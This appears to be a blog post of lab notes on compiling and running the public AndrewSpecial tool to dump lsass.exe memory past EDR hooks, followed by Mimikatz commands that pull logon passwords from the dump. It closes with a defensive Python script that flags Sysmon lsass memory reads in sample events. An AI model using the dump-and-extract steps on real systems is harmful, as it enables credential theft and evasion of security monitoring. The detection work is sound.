Ultra short entry here. While reading a very interesting article on bypassing one endpoint security product to silently dump lsass.exe without getting detected (https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6), one will of course want to reproduce the steps, and since the code is available here:
https://github.com/hoangprod/AndrewSpecial/tree/master
I have just done that in my lab.
The notes below might save some seconds if one gets stuck compiling it (I used Visual Studio 2013 on Windows 7 SP1 64-bit to build it).
On the Windows build server, just download master.zip: https://github.com/hoangprod/AndrewSpecial/archive/master.zip
Modify AndrewSpecial.h to include the additional #pragma comment (lib, "advapi32.lib"), so that the top of the header reads:
#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <DbgHelp.h>
#pragma comment (lib, "Dbghelp.lib")
#pragma comment (lib, "ntdll.lib")
#pragma comment (lib, "advapi32.lib")   // the additional line

void getversion_long();
bool AndrewSpecial(const wchar_t * ProcessName);

// Prototype for the ntdll export; the SDK headers do not declare it.
EXTERN_C NTSTATUS NTAPI NtReadVirtualMemory(HANDLE, PVOID, PVOID, ULONG, PULONG);
// Function-pointer type for RtlGetVersion, resolved from ntdll at runtime.
typedef NTSTATUS(NTAPI* RtlGetVersion_t)(_Out_ PRTL_OSVERSIONINFOW lpVersionInformation);

// OS version codes, encoded as major/minor (0xMMmm00).
enum supported_versions
{
    win8  = 0x060200,
    win81 = 0x060300,
    win10 = 0x0A0000,
};
Open up the VS2013 x64 Native Tools Command Prompt, cd to the source directory and build:
cl *.cpp /DUNICODE
Next we transfer the compiled Andrew.exe binary to the Windows 10 box in our testing lab and execute it.
The resulting Andrew.dmp can be fed to a separate instance of Mimikatz on some other machine as follows:
mimikatz # sekurlsa::minidump Andrew.dmp
mimikatz # sekurlsa::logonPasswords
Courtesy of CaledoniaProject (see the pull request):
https://github.com/hoangprod/AndrewSpecial/pull/1/commits/0320bf38ad02aa8b000b8095be35242b826d0f64
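A defender-side check, added here and not part of the original post or of the AndrewSpecial project: whatever happens to userland hooks, a dump of this kind still has to open a handle to lsass.exe with memory-read rights, and Sysmon Event ID 10 (ProcessAccess) records such handle opens from a kernel callback. The script below parses constructed Sysmon records (field names are the real Sysmon ones; the values, the path to Andrew.exe and the allowlist are made up) and flags any non-allowlisted image that obtained PROCESS_VM_READ on lsass.

```python
"""Flag Sysmon Event ID 10 (ProcessAccess) records that open lsass.exe with
memory-read rights. All sample records below are constructed for this example."""

# Win32 process access rights (winnt.h). Reading another process's memory,
# which any lsass dump needs, requires PROCESS_VM_READ in the granted mask.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# Hypothetical allowlist of images that legitimately touch lsass on this host;
# tune it from a baseline of the real environment.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed Sysmon Event ID 10 bodies, one per line, "Key: value" pairs
# separated by "|". Field names match the Sysmon schema; values are made up.
SAMPLE_EVENTS = [
    "SourceImage: C:\\Users\\lab\\Desktop\\Andrew.exe|TargetImage: C:\\Windows\\System32\\lsass.exe|GrantedAccess: 0x1010",
    "SourceImage: C:\\Windows\\System32\\csrss.exe|TargetImage: C:\\Windows\\System32\\lsass.exe|GrantedAccess: 0x1FFFFF",
    "SourceImage: C:\\Program Files\\Tool\\agent.exe|TargetImage: C:\\Windows\\System32\\lsass.exe|GrantedAccess: 0x1000",
    "SourceImage: C:\\Users\\lab\\Desktop\\Andrew.exe|TargetImage: C:\\Windows\\System32\\svchost.exe|GrantedAccess: 0x1010",
]


def parse_event(line: str) -> dict:
    """Turn 'Key: value|Key: value' into a dict; GrantedAccess becomes an int."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(":")
        fields[key.strip()] = value.strip()
    fields["GrantedAccess"] = int(fields.get("GrantedAccess", "0"), 16)
    return fields


def is_lsass_read(event: dict) -> bool:
    """True when a non-allowlisted image got memory-read access to lsass.exe."""
    target = event.get("TargetImage", "").lower()
    source = event.get("SourceImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    if source in ALLOWLIST:
        return False
    return bool(event["GrantedAccess"] & PROCESS_VM_READ)


def find_lsass_readers(lines) -> list:
    """Return the SourceImage of every record that trips is_lsass_read."""
    return [parse_event(l)["SourceImage"] for l in lines if is_lsass_read(parse_event(l))]


if __name__ == "__main__":
    for image in find_lsass_readers(SAMPLE_EVENTS):
        print("lsass memory read by:", image)
```

Sysmon only emits Event ID 10 when its configuration contains a ProcessAccess rule covering lsass.exe, so the check is only as good as the deployed config.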